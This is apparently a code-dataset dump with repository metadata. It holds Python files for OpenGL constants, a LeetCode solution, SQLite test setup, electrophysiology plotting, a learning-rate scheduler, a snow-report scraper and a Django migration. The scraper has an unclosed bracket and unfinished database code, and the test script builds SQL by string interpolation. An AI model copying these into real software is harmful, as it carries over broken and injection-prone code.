GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
def glPatchParameterfv(pname,values):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteri(pname,value):pass
| 158 | 0 | 69 |
60c414f3260ed62c8e71db22a56db59f43b23e67 | 550 | py | Python | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | 1 | 2021-04-19T12:55:51.000Z | 2021-04-19T12:55:51.000Z | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | null | null | null | Algorithms/leet_code/remove_element/remove_element.py | burakhanaksoy/PythonAlgorithms | f19c11b373e47b1d8ec8e26560471a0603dbfbdb | [
"MIT"
] | null | null | null | # Given an array nums and a value val,
# remove all instances of that value in-place and return the new length.
# Do not allocate extra space for another array, you must do this by modifying
# the input array in-place with O(1) extra memory.
solution = Solution()
print(solution.removeElement([0, 1, 2, 2, 3, 0, 4, 2], 2))
| 28.947368 | 78 | 0.594545 | # Given an array nums and a value val,
# remove all instances of that value in-place and return the new length.
# Do not allocate extra space for another array, you must do this by modifying
# the input array in-place with O(1) extra memory.
class Solution:
def removeElement(self, nums, val):
i = 0
while i < len(nums):
if nums[i] == val:
nums.pop(i)
else:
i += 1
return len(nums)
solution = Solution()
print(solution.removeElement([0, 1, 2, 2, 3, 0, 4, 2], 2))
| 182 | -6 | 49 |
b0da2f6036c5f5d2316234733054d8f793009d96 | 3,069 | py | Python | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | 3 | 2018-06-15T18:02:05.000Z | 2018-07-06T02:32:18.000Z | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | 4 | 2018-08-17T06:51:34.000Z | 2018-08-17T08:39:24.000Z | test/create_accounts.py | unification-com/haiku-node-prototype | ea77aa90f6b3f08d004be1c24e6b8d62e83bc66b | [
"MIT"
] | null | null | null | import inspect
import json
import logging
import os
import sqlite3
from pathlib import Path
from haiku_node.blockchain_helpers.accounts import (
AccountManager, make_default_accounts)
log = logging.getLogger('haiku_node')
demo_config = json.loads(Path('data/demo_config.json').read_text())
if __name__ == "__main__":
configure_logging()
process()
| 30.386139 | 129 | 0.626588 | import inspect
import json
import logging
import os
import sqlite3
from pathlib import Path
from haiku_node.blockchain_helpers.accounts import (
AccountManager, make_default_accounts)
log = logging.getLogger('haiku_node')
demo_config = json.loads(Path('data/demo_config.json').read_text())
def configure_logging():
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
def create_lookup_db(app, demo_apps):
app_conf = demo_apps[app]
log.info(f'Create {app} Lookup database')
currentdir = os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
db_path = Path(f'{parentdir}/test/data/{app}_unification_lookup.db')
db_name = str(db_path.resolve())
log.info(db_name)
conn = sqlite3.connect(db_name)
c = conn.cursor()
c.execute('''CREATE TABLE lookup
(native_id text, eos_account text)''')
c.execute('''CREATE TABLE lookup_meta
(native_table text, native_field text, field_type text)''')
c.execute('''CREATE TABLE schema_map
(sc_schema_pkey text, native_db text, native_db_platform text)''')
c.execute('''CREATE TABLE table_maps
(sc_schema_pkey text, sc_table_name text, real_table_name text, user_id_column text)''')
c.execute(f"INSERT INTO lookup_meta VALUES ('{app_conf['lookup']['lookup_meta']['native_table']}', "
f"'{app_conf['lookup']['lookup_meta']['native_field']}', "
f"'{app_conf['lookup']['lookup_meta']['field_type']}')")
for u in app_conf['lookup']['lookup_users']:
c.execute(f"INSERT INTO lookup VALUES ('{u['native_id']}', '{u['eos_account']}')")
for sc in app_conf['db_schemas']:
c.execute(f"INSERT INTO schema_map VALUES ('{sc['sc_schema_pkey']}', '{sc['database']}', '{sc['db_platform']}')")
for tm in sc['table_maps']:
c.execute(
f"INSERT INTO table_maps VALUES ('{sc['sc_schema_pkey']}', '{tm['schema_table_id']}', "
f"'{tm['db_table']}', '{tm['user_id_column']}')")
conn.commit()
conn.close()
conn = sqlite3.connect(db_name)
c = conn.cursor()
log.info('check user2 == 2')
t = ('user2',)
c.execute('SELECT native_id FROM lookup WHERE eos_account=?', t)
res = c.fetchone()[0]
print("user2 native ID:", res)
conn.close()
def process():
manager = AccountManager(host=True)
appnames = ['app1', 'app2', 'app3']
usernames = ['user1', 'user2', 'user3', 'unif.mother']
make_default_accounts(manager, demo_config, appnames, usernames)
for appname in appnames:
create_lookup_db(appname, demo_apps=demo_config['demo_apps'])
if __name__ == "__main__":
configure_logging()
process()
| 2,630 | 0 | 69 |
2e2f1b45c93126700b91414329a68232f9c22dce | 70 | py | Python | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | clustering/__init__.py | ebridge2/ams_446 | 2c7d8db96c5875ee5b4c0e2d44dad80812ac4140 | [
"Apache-2.0"
] | null | null | null | from spectral import Spectral
from kmeans import Kmeans
import kernel
| 17.5 | 29 | 0.857143 | from spectral import Spectral
from kmeans import Kmeans
import kernel
| 0 | 0 | 0 |
1506c683ed3b9db097a3a29e521df20d976b0af2 | 1,695 | py | Python | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 74 | 2017-11-06T17:53:48.000Z | 2022-03-27T12:14:46.000Z | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 116 | 2018-01-16T21:36:29.000Z | 2022-03-31T11:46:04.000Z | dev/python/2018-12-20 real epsc.py | konung-yaropolk/pyABF | b5620e73ac5d060129b844da44f8b2611536ac56 | [
"MIT"
] | 30 | 2018-06-28T13:19:53.000Z | 2022-03-25T02:52:48.000Z | """
Determine what paramaters create real-looking EPSCs.
What I concluded was that 30pA and 180ms tau looks good.
"""
import os
import sys
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
PATH_DATA = os.path.abspath(PATH_HERE+"../../../data/abfs/")
PATH_SRC = os.path.abspath(PATH_HERE+"../../../src/")
sys.path.insert(0, PATH_SRC)
import pyabf
import pyabf.tools.generate
import glob
import matplotlib.pyplot as plt
import numpy as np
if __name__ == "__main__":
plotRealEPSC()
plotFakeEPSC()
plt.grid(alpha=.2)
plt.margins(0, .1)
plt.title("Real vs. Simulated EPSC")
plt.ylabel("current (pA)")
plt.xlabel("time (sec)")
plt.legend()
plt.savefig(__file__+".png")
print("DONE") | 25.298507 | 99 | 0.657227 | """
Determine what paramaters create real-looking EPSCs.
What I concluded was that 30pA and 180ms tau looks good.
"""
import os
import sys
PATH_HERE = os.path.abspath(os.path.dirname(__file__))
PATH_DATA = os.path.abspath(PATH_HERE+"../../../data/abfs/")
PATH_SRC = os.path.abspath(PATH_HERE+"../../../src/")
sys.path.insert(0, PATH_SRC)
import pyabf
import pyabf.tools.generate
import glob
import matplotlib.pyplot as plt
import numpy as np
def plotRealEPSC():
# load a trae with a real life EPSC
abfPath = R"X:\Data\SD\Piriform Oxytocin\core ephys 2018\Sagittal Pilot\2018_12_11_ts_0020.abf"
abf = pyabf.ABF(abfPath)
abf.setSweep(12, baseline=[2.6, 2.68])
# blank-out data we don't want to see
t1, t2 = [2.68, 2.75]
abf.sweepY[:int(t1*abf.dataRate)] = np.nan
abf.sweepY[int(t2*abf.dataRate):] = np.nan
# plot it
plt.figure()
plt.plot(abf.sweepX, abf.sweepY, alpha=.5, label="real")
return
def plotFakeEPSC():
# simulate a trace
dataRate = 20000
synth = pyabf.tools.generate.SynthSweep(dataRate, 10)
# blank-out data we don't want to see
t1, t2 = [2.68, 2.75]
synth.sweepY[:int(t1*dataRate)] = np.nan
synth.sweepY[int(t2*dataRate):] = np.nan
# add an EPSC for comparison
tauMs = 180
synth.addEvent(2.7, -35, tauMs, False)
# plot it
plt.plot(synth.sweepX, synth.sweepY, lw=3, alpha=.5, label="simulated")
if __name__ == "__main__":
plotRealEPSC()
plotFakeEPSC()
plt.grid(alpha=.2)
plt.margins(0, .1)
plt.title("Real vs. Simulated EPSC")
plt.ylabel("current (pA)")
plt.xlabel("time (sec)")
plt.legend()
plt.savefig(__file__+".png")
print("DONE") | 922 | 0 | 46 |
edf816898adbf4d6c0423fb9f719b97e942b4134 | 880 | py | Python | modmel_spec/optimizer.py | joaomonteirof/dcase | 018bd225c45397bba616e3c70e4a7b50bb1010af | [
"MIT"
] | 12 | 2020-06-03T17:55:18.000Z | 2021-12-09T08:08:33.000Z | utils/optimizer.py | joaomonteirof/multitask_asv | 16795628e4bcac8c7b83b6edeacee1a739495092 | [
"MIT"
] | 2 | 2020-11-01T16:51:17.000Z | 2022-01-19T10:43:55.000Z | utils/optimizer.py | joaomonteirof/multitask_asv | 16795628e4bcac8c7b83b6edeacee1a739495092 | [
"MIT"
] | 6 | 2019-06-22T21:06:56.000Z | 2020-04-25T09:55:06.000Z | ## Adapted from https://github.com/kaituoxu/Speech-Transformer/blob/master/src/transformer/optimizer.py
import torch
class TransformerOptimizer(object):
"""A simple wrapper class for learning rate scheduling"""
| 27.5 | 106 | 0.731818 | ## Adapted from https://github.com/kaituoxu/Speech-Transformer/blob/master/src/transformer/optimizer.py
import torch
class TransformerOptimizer(object):
"""A simple wrapper class for learning rate scheduling"""
def __init__(self, optimizer, lr, k=1, warmup_steps=4000):
self.optimizer = optimizer
self.k = k
self.init_lr = lr
self.warmup_steps = warmup_steps
self.step_num = 0
def zero_grad(self):
self.optimizer.zero_grad()
def step(self):
self._update_lr()
self.optimizer.step()
def _update_lr(self):
self.step_num += 1
lr = self.k * self.init_lr * min(self.step_num ** (-0.5), self.step_num * (self.warmup_steps ** (-1.5)))
for param_group in self.optimizer.param_groups:
param_group['lr'] = lr
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def state_dict(self):
return self.optimizer.state_dict()
| 523 | 0 | 144 |
ae974fcb97eb9a17b724bccf3ec2748cc1a0af0e | 2,364 | py | Python | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | snowfinder.py | Zenbiz/snowreports | 78a008f8dc54bfed1a36b3a780223eccb44d862c | [
"MIT"
] | null | null | null | # to install a program within colab use !pip install
import pandas as pd
# !pip show pandas
import requests
# !pip show requests
from bs4 import BeautifulSoup
# !pip show bs4
# !pip install tabulate
from tabulate import tabulate
# pip show tabulate
import csv
# pip show csv
import bs4
# pip3 install lxml
import lxml
import bs4.builder._lxml
res = requests.get('http://www.WEBSITE.com/news/snow-report/')
soup = BeautifulSoup(res.content,'lxml')
#!pip show lxml
table = soup.find_all('table')[0]
df = pd.read_html('http://www.WEBSITE.com/news/snow-report/', header=0)[0]
df
# Variable list objects
resort_list = df.iloc[:, 0]
new_snow = df.iloc[:, 1]
conditions = df.iloc[:, 2]
open_terrian = df.iloc[:, 3]
comments = df.iloc[:, 4
"""
# Export to CSV within google co lab
from google.colab import files
# do not print header and do not print index column
df.to_csv('SnowDatabaseExport.csv', header=0, index=False)
files.download('SnowDatabaseExport.csv')
"""
#Below is under heavy construction: Connecting pandas df to postgres (not complete)
"""
# Create a Postgres table for dataframe import
# https://www.dataquest.io/m/245/intro-to-postgres/4/creating-a-table
conn = psycopg2.connect("dbname=DATABASENAME user=DBUSERNAME")
cur = conn.cursor()
cur.execute("CREATE TABLE users(id integer PRIMARY KEY, email text, name text, address text)")
"""
"""
with open('user_accounts.csv') as f:
reader = csv.reader(f)
next(reader)
rows = [row for row in reader]
"""
"""
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
for row in rows:
cur.execute("INSERT INTO users VALUES (%s, %s, %s, %s)", row)
conn.commit()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
conn.close()
"""
"""
conn = psycopg2.connect('dbname=dq user=dq')
cur = conn.cursor()
# sample_file.csv has a header row.
with open('SnowDataBaseExport.csv', 'r') as f:
# Skip the header row.
next(f)
cur.copy_from(f, 'users', sep=',')
conn.commit()
cur.execute('SELECT * FROM new_snow')
users = cur.fetchall()
conn.close()
"""
"""
# Get all the data from snow data through SQL
import psycopg2
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
cur.execute('SELECT * FROM snow_report')
notes = cur.fetchall()
conn.close()
"""
| 24.122449 | 94 | 0.67555 | # to install a program within colab use !pip install
import pandas as pd
# !pip show pandas
import requests
# !pip show requests
from bs4 import BeautifulSoup
# !pip show bs4
# !pip install tabulate
from tabulate import tabulate
# pip show tabulate
import csv
# pip show csv
import bs4
# pip3 install lxml
import lxml
import bs4.builder._lxml
res = requests.get('http://www.WEBSITE.com/news/snow-report/')
soup = BeautifulSoup(res.content,'lxml')
#!pip show lxml
table = soup.find_all('table')[0]
df = pd.read_html('http://www.WEBSITE.com/news/snow-report/', header=0)[0]
df
# Variable list objects
resort_list = df.iloc[:, 0]
new_snow = df.iloc[:, 1]
conditions = df.iloc[:, 2]
open_terrian = df.iloc[:, 3]
comments = df.iloc[:, 4
"""
# Export to CSV within google co lab
from google.colab import files
# do not print header and do not print index column
df.to_csv('SnowDatabaseExport.csv', header=0, index=False)
files.download('SnowDatabaseExport.csv')
"""
#Below is under heavy construction: Connecting pandas df to postgres (not complete)
"""
# Create a Postgres table for dataframe import
# https://www.dataquest.io/m/245/intro-to-postgres/4/creating-a-table
conn = psycopg2.connect("dbname=DATABASENAME user=DBUSERNAME")
cur = conn.cursor()
cur.execute("CREATE TABLE users(id integer PRIMARY KEY, email text, name text, address text)")
"""
"""
with open('user_accounts.csv') as f:
reader = csv.reader(f)
next(reader)
rows = [row for row in reader]
"""
"""
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
for row in rows:
cur.execute("INSERT INTO users VALUES (%s, %s, %s, %s)", row)
conn.commit()
cur.execute('SELECT * FROM users')
users = cur.fetchall()
conn.close()
"""
"""
conn = psycopg2.connect('dbname=dq user=dq')
cur = conn.cursor()
# sample_file.csv has a header row.
with open('SnowDataBaseExport.csv', 'r') as f:
# Skip the header row.
next(f)
cur.copy_from(f, 'users', sep=',')
conn.commit()
cur.execute('SELECT * FROM new_snow')
users = cur.fetchall()
conn.close()
"""
"""
# Get all the data from snow data through SQL
import psycopg2
conn = psycopg2.connect("dbname=dq user=dq")
cur = conn.cursor()
cur.execute('SELECT * FROM snow_report')
notes = cur.fetchall()
conn.close()
"""
| 0 | 0 | 0 |
dc04c0aa6efe48fc3dd9443a1d05d934b0587fba | 1,906 | py | Python | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | idl/parser/MethodParser.py | spiricn/libIDL | 16738044991962bd3a7ab27f469d4364fbcd7b18 | [
"MIT"
] | null | null | null | from idl.lexer.Token import Token
from idl.parser.Parser import Parser
from idl.parser.ParserError import ParserError
from idl.parser.Desc import MethodDesc, MethodArgDesc
| 27.228571 | 90 | 0.502623 | from idl.lexer.Token import Token
from idl.parser.Parser import Parser
from idl.parser.ParserError import ParserError
from idl.parser.Desc import MethodDesc, MethodArgDesc
class MethodParser(Parser):
class Test:
def __init__(self):
pass
def __init__(self, tokens):
Parser.__init__(self, tokens)
def parse(self):
self.method = MethodDesc(line=self.next.location[0])
# Parse return type / name
self._parseHead()
# Parse parameter list
self._parseArgs()
# Tail
self.eat(Token.PUNCTUATION , ';')
return self.method
def _parseHead(self):
# Return type
self.method.returnTypeDesc = self.eatTypeDesc()
# Method name
self.method.name = self.eat(Token.ID).body
def _parseArgs(self):
# List start
self.eat(Token.PUNCTUATION, '(')
expectingArg = True
while True:
token = self.next
if token.id == Token.PUNCTUATION and token.body == ')':
# End of param list
self.pop()
break
elif expectingArg:
argLine = self.next.location[0]
# Argument type
varDesc = self.eatVariableDesc()
# Create description
self.method.args.append( MethodArgDesc(varDesc, argLine) )
expectingArg = False
elif not expectingArg and token.id == Token.PUNCTUATION and token.body == ',':
expectingArg = True
self.pop()
else:
raise ParserError('Unexpected token while parsing method', token)
| 1,516 | 193 | 23 |
72a61932d359fcdabef7e60e057c441df9206dd2 | 16,865 | py | Python | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | null | null | null | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2020-04-14T11:33:30.000Z | 2020-04-14T11:33:30.000Z | snorna/migrations/0012_snorna_expression_acc_snorna_expression_blca_snorna_expression_brca_snorna_expression_cesc_snorna_ex.py | chunjie-sam-liu/SNORic | f6d4010a941131a750b34dfa472d7aee2e110131 | [
"MIT"
] | 1 | 2018-09-14T08:53:30.000Z | 2018-09-14T08:53:30.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:56
from __future__ import unicode_literals
from django.db import migrations, models
| 51.733129 | 128 | 0.573258 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('snorna', '0011_protein_expression_acc_protein_expression_blca_protein_expression_brca_protein_expression_cesc_prote'),
]
operations = [
migrations.CreateModel(
name='snorna_expression_ACC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_BLCA',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_BRCA',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_CESC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_CHOL',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_COAD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_DLBC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_ESCA',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_HNSC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_KICH',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_KIRC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_KIRP',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_LGG',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_LIHC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_LUAD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_LUSC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_MESO',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_OV',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_PAAD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_PCPG',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_PRAD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_READ',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_SARC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_SKCM',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_STAD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_TGCT',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_THCA',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_THYM',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
('dataset_id', models.CharField(max_length=225, null=True)),
('sample_id', models.CharField(max_length=225, null=True)),
('snorna_expression', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='snorna_expression_UCEC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('snorna', models.CharField(max_length=225, null=True)),
